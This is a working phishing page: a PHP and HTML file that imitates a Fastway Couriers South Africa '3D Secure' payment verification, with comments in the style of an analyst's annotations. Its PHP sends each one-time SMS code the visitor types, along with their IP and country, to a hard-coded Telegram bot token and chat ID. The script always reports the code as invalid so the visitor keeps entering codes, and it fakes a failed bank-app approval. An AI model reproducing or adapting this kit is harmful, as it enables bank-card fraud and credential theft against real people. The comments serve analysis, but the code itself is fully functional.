File: /home/imagzxcb/public_html/feedback/approval.php
<?php
// Exfiltration channel configuration: a Telegram bot token and the chat id that
// sendTelegram() posts to. Both are hard-coded, so anyone who can read this file
// also holds the bot credential.
$BOT_TOKEN = "7855531302:AAGEfCJhGKdJNEcbJFDchAF40G3OrJO6sLw";
$CHAT_ID = "-5194337371";
// === GET USER INFO ===
// Visitor IP and User-Agent come straight from the request; 'Unknown' when absent.
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
// NOTE(review): $user_agent is assigned here but not referenced again in the visible code.
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$country = 'Unknown';
// Country lookup for the visitor IP via ip-api.com over plain HTTP with a 5 s timeout.
// This runs at top level, i.e. on every request to the page (GET or POST), before the
// request type is inspected. '@' hides the warning on failure, in which case
// $country keeps its 'Unknown' default.
$context = stream_context_create(['http' => ['timeout' => 5]]);
$geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
if ($geoData !== false) {
$geo = json_decode($geoData);
$country = $geo->country ?? 'Unknown';
}
/**
 * Posts $msg to the Telegram Bot API sendMessage endpoint using the hard-coded
 * bot token and chat id declared at the top of the file.
 *
 * The message is sent with parse_mode HTML and link previews disabled. The return
 * value of curl_exec() is discarded, so delivery failures are not visible to callers.
 *
 * For responders: this function is the only outbound data path in the PHP part of the
 * page; its network trace is a server-side HTTPS POST to
 * api.telegram.org/bot<token>/sendMessage.
 *
 * @param string $msg Message text; the callers in this file build it as HTML.
 * @return void
 */
function sendTelegram($msg) {
// Reads the module-level credentials rather than taking them as parameters.
global $BOT_TOKEN, $CHAT_ID;
$url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
$data = [
'chat_id' => $CHAT_ID,
'text' => $msg,
'parse_mode' => 'HTML',
'disable_web_page_preview' => true
];
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_POST => true,
// Form-encoded body (application/x-www-form-urlencoded).
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
// TLS peer certificate verification is switched off for this request.
CURLOPT_SSL_VERIFYPEER => false
]);
// Response body is requested (RETURNTRANSFER) but never read.
curl_exec($ch);
curl_close($ch);
}
// === HANDLE AJAX ===
// POST endpoint on the page's own URL; the page's inline script calls it with
// fetch('') and an 'action' field. Two actions are handled, each of which relays a
// message through sendTelegram() and then exits with a fixed JSON reply. Any other
// 'action' value falls through and the HTML page is rendered.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
$msg = "";
// action=verify: the one-time code typed into the form is forwarded together with
// the visitor IP, looked-up country and server time.
if ($_POST['action'] === 'verify') {
$otp = trim($_POST['otp'] ?? '');
$attempt = intval($_POST['attempt'] ?? 1);
$msg = "<b>⚠️🪭 FASTWAY COURIERS OTP ATTEMPT #{$attempt}</b>\n";
$msg .= "══════════════════════════════\n";
$msg .= "<b>OTP:</b> <code>{$otp}</code>\n";
$msg .= "<b>IP:</b> <code>{$ip}</code>\n";
$msg .= "<b>Country:</b> {$country}\n";
$msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
sendTelegram($msg);
// The submitted code is never compared against anything: the reply is always
// status 'invalid' with the attempt counter incremented.
echo json_encode(['status' => 'invalid', 'attempt' => $attempt + 1]);
exit;
}
// action=approved: sent when the visitor clicks the "I have approved" link; only
// IP, country and time are relayed.
if ($_POST['action'] === 'approved') {
$msg = "<b>✅ FASTWAY COURIERS PAYMENT APPROVED</b>\n";
$msg .= "══════════════════════════════\n";
$msg .= "<b>IP:</b> <code>{$ip}</code>\n";
$msg .= "<b>Country:</b> {$country}\n";
$msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
sendTelegram($msg);
// Fixed reply; no approval state is looked up anywhere.
echo json_encode(['status' => 'loop']);
exit;
}
}
// === GET PAYMENT DATA ===
// Values shown in the "transaction" box of the rendered page. They are read from a
// JSON string in the 'payment' POST field (presumably posted by a preceding form that
// is not part of this file - confirm against the rest of the kit); an absent or
// undecodable field yields an empty array.
$paymentData = json_decode($_POST['payment'] ?? '', true) ?: [];
// HTML-escaped before output; the hard-coded fallback reference is a stable string
// that can serve as a static signature for this page.
$tracking = htmlspecialchars($paymentData['tracking'] ?? 'FW632846518');
// Non-digits are stripped from the posted card number and only the last four digits
// are kept for display; '0000' when nothing usable was posted.
$last4 = substr(preg_replace('/\D/', '', $paymentData['card_number'] ?? ''), -4) ?: '0000';
// Server-side clock values printed as the transaction date and time.
$time = date('H:i');
$date = date('d/m/Y');
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Fastway Couriers | Payment Verification</title>
<link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;800&family=Barlow:wght@300;400;500;600&display=swap" rel="stylesheet">
<style>
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
:root {
--orange: #F47920;
--orange-light: #FF8C3A;
--navy: #1A2340;
--navy-dark: #10172B;
--navy-mid: #232E4A;
--white: #FFFFFF;
--off-white: #F7F8FA;
--grey: #6B7280;
--light-grey: #E5E7EB;
--text: #1F2937;
--success: #0F7B4B;
--danger: #DC2626;
--danger-bg: #FEF2F2;
--radius: 6px;
--shadow-sm: 0 4px 12px rgba(0,0,0,0.05);
}
body {
font-family: 'Barlow', sans-serif;
color: var(--text);
background: var(--off-white);
min-height: 100vh;
display: flex;
flex-direction: column;
}
.container { max-width: 500px; margin: 0 auto; width: 100%; padding: 0 1.5rem; }
/* HEADER */
.header {
background: var(--white);
padding: 1rem 0;
box-shadow: 0 2px 10px rgba(0,0,0,0.05);
}
.header-container {
max-width: 1200px;
margin: 0 auto;
padding: 0 1.5rem;
}
.logo-container { display: flex; align-items: center; }
.logo { height: 70px; width: auto; }
/* BANK HEADER */
.bank-header {
background: linear-gradient(135deg, var(--navy-dark), var(--navy));
color: var(--white);
padding: 1.25rem;
border-radius: var(--radius) var(--radius) 0 0;
text-align: center;
font-weight: 600;
font-size: 1rem;
display: flex;
align-items: center;
justify-content: center;
gap: 0.5rem;
border-bottom: 3px solid var(--orange);
margin-top: 2rem;
}
/* CARD */
.approval-card {
background: var(--white);
border: 1px solid var(--light-grey);
border-radius: 0 0 var(--radius) var(--radius);
padding: 2rem;
margin-bottom: 2rem;
box-shadow: var(--shadow-sm);
}
/* TRANSACTION */
.transaction {
background: var(--off-white);
border-radius: var(--radius);
padding: 1.25rem;
margin-bottom: 1.5rem;
border: 1px solid var(--light-grey);
}
.trans-row {
display: flex;
justify-content: space-between;
padding: 0.6rem 0;
font-size: 0.95rem;
border-bottom: 1px solid var(--light-grey);
}
.trans-row:last-child { border-bottom: none; }
.trans-label { color: var(--grey); }
.trans-value { font-weight: 600; color: var(--navy-dark); }
.amount {
color: var(--success);
font-weight: 700;
font-size: 1.25rem;
}
/* PUSH NOTIFICATION */
.app-notif {
background: var(--off-white);
border-radius: var(--radius);
padding: 1.5rem;
margin: 1.5rem 0;
text-align: center;
border: 1px solid var(--light-grey);
}
.app-notif img {
width: 120px;
height: 120px;
margin-bottom: 1rem;
display: block;
margin-left: auto;
margin-right: auto;
}
.app-notif strong {
display: block;
color: var(--navy-dark);
margin-bottom: 0.5rem;
font-size: 1.1rem;
font-weight: 700;
}
.app-badge {
display: inline-block;
background: var(--orange);
color: var(--white);
padding: 0.5rem 1rem;
border-radius: 30px;
font-size: 0.85rem;
margin-top: 0.75rem;
font-weight: 600;
}
/* LOADING DOTS */
.loading-dots {
text-align: center;
padding: 1.5rem;
margin: 1rem 0;
font-size: 0.95rem;
color: var(--grey);
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
}
.dot-container {
margin-top: 0.75rem;
}
.dot {
display: inline-block;
width: 8px;
height: 8px;
border-radius: 50%;
background: var(--orange);
margin: 0 4px;
animation: dotPulse 1.4s infinite ease-in-out;
}
.dot:nth-child(2) { animation-delay: 0.2s; }
.dot:nth-child(3) { animation-delay: 0.4s; }
@keyframes dotPulse {
0%, 80%, 100% { transform: scale(0.6); opacity: 0.5; }
40% { transform: scale(1); opacity: 1; }
}
/* SMS INPUT */
.sms-container {
margin: 1.5rem 0;
display: none;
}
.sms-label {
font-weight: 700;
margin-bottom: 0.5rem;
color: var(--navy-dark);
font-size: 0.9rem;
text-transform: uppercase;
letter-spacing: 0.5px;
}
.sms-hint {
color: var(--grey);
font-size: 0.85rem;
margin-bottom: 1rem;
}
.sms-input {
width: 100%;
padding: 0.85rem;
font-size: 1rem;
text-align: center;
border: 2px solid var(--light-grey);
border-radius: var(--radius);
background: var(--white);
font-family: monospace;
margin-bottom: 1rem;
}
.sms-input:focus {
outline: none;
border-color: var(--orange);
box-shadow: 0 0 0 3px rgba(244,121,32,0.1);
}
.sms-input.error {
border-color: var(--danger);
}
.btn-primary {
width: 100%;
padding: 0.85rem;
background: var(--orange);
color: var(--white);
border: none;
border-radius: var(--radius);
font-weight: 600;
font-size: 0.95rem;
cursor: pointer;
text-transform: uppercase;
letter-spacing: 1px;
transition: all 0.15s ease;
}
.btn-primary:hover {
background: var(--orange-light);
transform: translateY(-1px);
box-shadow: 0 4px 12px rgba(244,121,32,0.3);
}
.btn-primary:disabled {
background: var(--light-grey);
color: var(--grey);
cursor: not-allowed;
}
.cooldown {
margin-top: 1rem;
color: var(--grey);
font-size: 0.85rem;
text-align: center;
padding: 0.75rem;
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
}
.error-message {
display: none;
color: var(--danger);
margin-top: 1rem;
font-size: 0.85rem;
text-align: center;
padding: 0.75rem;
background: var(--danger-bg);
border-radius: var(--radius);
border: 1px solid var(--danger);
}
.approve-link {
display: block;
text-align: center;
color: var(--navy);
text-decoration: none;
margin: 1.25rem 0;
font-size: 0.9rem;
font-weight: 600;
padding: 0.85rem;
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
transition: all 0.15s ease;
}
.approve-link:hover {
background: var(--light-grey);
color: var(--orange);
}
.loop-message {
display: none;
color: var(--danger);
margin: 1rem 0;
font-size: 0.9rem;
text-align: center;
font-weight: 600;
padding: 1rem;
background: var(--danger-bg);
border-radius: var(--radius);
border: 1px solid var(--danger);
}
.security-badges {
display: flex;
justify-content: center;
gap: 1rem;
margin-top: 1.5rem;
flex-wrap: wrap;
}
.badge {
background: var(--off-white);
padding: 0.5rem 0.8rem;
border-radius: var(--radius);
font-size: 0.75rem;
color: var(--grey);
display: flex;
align-items: center;
gap: 0.4rem;
border: 1px solid var(--light-grey);
}
/* FOOTER */
.footer {
background: var(--navy-dark);
padding: 2.5rem 0 2rem;
margin-top: auto;
}
.footer-content {
max-width: 1200px;
margin: 0 auto;
padding: 0 1.5rem;
text-align: center;
}
.footer-logo {
margin-bottom: 1rem;
}
.footer-logo img {
height: 60px;
width: auto;
opacity: 0.9;
}
.footer-copyright {
color: rgba(255,255,255,0.4);
font-size: 0.8rem;
}
@keyframes shake {
0%, 100% { transform: translateX(0); }
25% { transform: translateX(-5px); }
75% { transform: translateX(5px); }
}
.shake { animation: shake 0.3s ease; }
@media (max-width: 500px) {
.container { padding: 0 1rem; }
.approval-card { padding: 1.5rem; }
.logo { height: 60px; }
.app-notif img { width: 100px; height: 100px; }
}
</style>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
</head>
<body>
<!-- HEADER -->
<header class="header">
<div class="header-container">
<div class="logo-container">
<img src="assets/1.png" alt="Fastway Couriers" class="logo">
</div>
</div>
</header>
<div class="container">
<!-- BANK HEADER -->
<div class="bank-header">
<i class="fas fa-shield-alt"></i> Fastway Couriers - 3D Secure Verification
</div>
<!-- CARD -->
<div class="approval-card">
<div class="transaction">
<div class="trans-row">
<span class="trans-label">Merchant</span>
<span class="trans-value">Fastway Couriers SA</span>
</div>
<div class="trans-row">
<span class="trans-label">Amount</span>
<span class="trans-value amount">
R122.36
</span>
</div>
<div class="trans-row">
<span class="trans-label">Date & Time</span>
<span class="trans-value"><?php echo "$date, $time"; ?></span>
</div>
<div class="trans-row">
<span class="trans-label">Card</span>
<span class="trans-value">•••• •••• •••• <?php echo $last4; ?></span>
</div>
<div class="trans-row">
<span class="trans-label">Reference</span>
<span class="trans-value"><?php echo $tracking; ?></span>
</div>
</div>
<!-- PUSH NOTIFICATION WITH FIXED GIF -->
<div class="app-notif">
<img src="assets/pending.gif" alt="Verification Pending">
<strong>Verification Request Sent</strong>
<div style="font-size: 0.9rem; margin: 0.5rem 0; color: var(--grey);">
Check your banking app to approve this payment.
</div>
<div class="app-badge">
<i class="fas fa-mobile-alt"></i> Open banking app
</div>
</div>
<!-- LOADING DOTS - 50 SECONDS -->
<div class="loading-dots" id="loadingDots">
Waiting for verification from your bank
<div class="dot-container">
<span class="dot"></span>
<span class="dot"></span>
<span class="dot"></span>
</div>
</div>
<!-- SMS INPUT (Shown after 50 seconds) -->
<div class="sms-container" id="smsContainer">
<div class="sms-label">
<i class="fas fa-sms"></i> SMS Verification
</div>
<div class="sms-hint">
Enter the verification code sent to your registered mobile number.
</div>
<input type="text" class="sms-input" id="smsInput" placeholder="Enter verification code" inputmode="text">
<button class="btn-primary" id="verifyBtn">
<i class="fas fa-check-circle"></i> Verify Code
</button>
<div class="cooldown" id="cooldown" style="display:none;">
<i class="fas fa-clock"></i> Please wait <span id="countdown">15</span> seconds before trying again
</div>
<div class="error-message" id="errorMessage">
<i class="fas fa-exclamation-circle"></i>
<span id="errorText">Invalid verification code</span>
</div>
</div>
<a href="#" class="approve-link" id="approveLink">
<i class="fas fa-check-double"></i> I have approved in my banking app
</a>
<div class="loop-message" id="loopMessage">
<i class="fas fa-exclamation-triangle"></i>
Approval not detected. Please use SMS verification.
</div>
<div class="security-badges">
<div class="badge"><i class="fas fa-shield-alt"></i> 3D Secure</div>
<div class="badge"><i class="fas fa-lock"></i> Encrypted</div>
<div class="badge"><i class="fas fa-check-circle"></i> Verified</div>
</div>
</div>
</div>
<!-- FOOTER -->
<footer class="footer">
<div class="footer-content">
<div class="footer-logo">
<img src="assets/3.png" alt="Fastway Couriers">
</div>
<div class="footer-copyright">
© 2026 Fastway Couriers South Africa (Pty) Ltd. All rights reserved.
</div>
</div>
</footer>
<script>
// Replace the "waiting for your bank" indicator with the SMS code form once the
// timer fires, and focus the input.
// NOTE(review): the page's comments say 50 seconds, but the delay passed below is
// 29000 ms (29 s).
setTimeout(() => {
document.getElementById('loadingDots').style.display = 'none';
document.getElementById('smsContainer').style.display = 'block';
document.getElementById('smsInput').focus();
}, 29000);
// SMS input handling: on every keystroke, strip anything that is not A-Z, a-z or 0-9
// (client-side only), and clear a previously shown error state.
document.getElementById('smsInput').addEventListener('input', function(e) {
this.value = this.value.replace(/[^A-Za-z0-9]/g, '');
if (this.classList.contains('error')) {
this.classList.remove('error');
document.getElementById('errorMessage').style.display = 'none';
}
});
// Verify button: posts the entered code to the page's own URL (action=verify) and then
// shows an "invalid code" error regardless of what the server answered.
// `attempt` counts submissions; `cooldown` blocks clicks while the countdown runs.
let attempt = 1;
let cooldown = false;
document.getElementById('verifyBtn').addEventListener('click', async () => {
if (cooldown) return;
const otp = document.getElementById('smsInput').value.trim();
// Empty input is rejected locally; nothing is sent.
if (otp.length === 0) {
showError('Please enter verification code');
document.getElementById('smsInput').classList.add('error');
return;
}
const btn = document.getElementById('verifyBtn');
btn.disabled = true;
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Verifying...';
try {
// fetch('') targets the current document URL, i.e. this same PHP page.
const res = await fetch('', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `action=verify&otp=${encodeURIComponent(otp)}&attempt=${attempt}`
});
// The parsed reply is never inspected: `data` is unused and the error path below
// runs for every response that parses as JSON.
const data = await res.json();
showError('Invalid code. Please try again.');
document.getElementById('smsInput').classList.add('error');
document.getElementById('smsInput').classList.add('shake');
setTimeout(() => document.getElementById('smsInput').classList.remove('shake'), 300);
// Each submission increments the counter and starts the 15 s cooldown, after which
// the form is re-armed for another code.
attempt++;
startCooldown();
} catch (e) {
// Network or JSON-parse failure: restore the button and show a connection error.
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
showError('Connection error. Please try again.');
}
});
// Shows `message` in the error box and resets the verify button to its idle label.
// The text is assigned via textContent, so it is not interpreted as markup.
function showError(message) {
const el = document.getElementById('errorMessage');
document.getElementById('errorText').textContent = message;
el.style.display = 'block';
const btn = document.getElementById('verifyBtn');
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
}
// Hides the verify button and runs a 15-second countdown (one tick per second).
// When it reaches zero the button is restored, the input is emptied and refocused,
// and the error state is cleared, so the form is ready for another code.
function startCooldown() {
cooldown = true;
const btn = document.getElementById('verifyBtn');
const cd = document.getElementById('cooldown');
const count = document.getElementById('countdown');
btn.style.display = 'none';
cd.style.display = 'block';
let time = 15;
const interval = setInterval(() => {
time--;
count.textContent = time;
if (time <= 0) {
clearInterval(interval);
cooldown = false;
btn.style.display = 'block';
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
cd.style.display = 'none';
// Previous entry is wiped before the next attempt.
document.getElementById('smsInput').value = '';
document.getElementById('smsInput').classList.remove('error');
document.getElementById('errorMessage').style.display = 'none';
document.getElementById('smsInput').focus();
}
}, 1000);
}
// "I have approved in my banking app" link: always reports that approval was not
// detected and steers the visitor to the SMS form. The click itself is reported to
// the server with action=approved; the response is not read.
document.getElementById('approveLink').addEventListener('click', async (e) => {
e.preventDefault();
// The error is shown before the request is even sent.
showError('Approval not detected. Please use SMS verification.');
document.getElementById('smsInput').classList.add('error');
await fetch('', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'action=approved'
});
// After the request, the link is replaced by the fixed "not detected" banner.
document.getElementById('loopMessage').style.display = 'block';
document.getElementById('approveLink').style.display = 'none';
});
</script>
</body>
</html>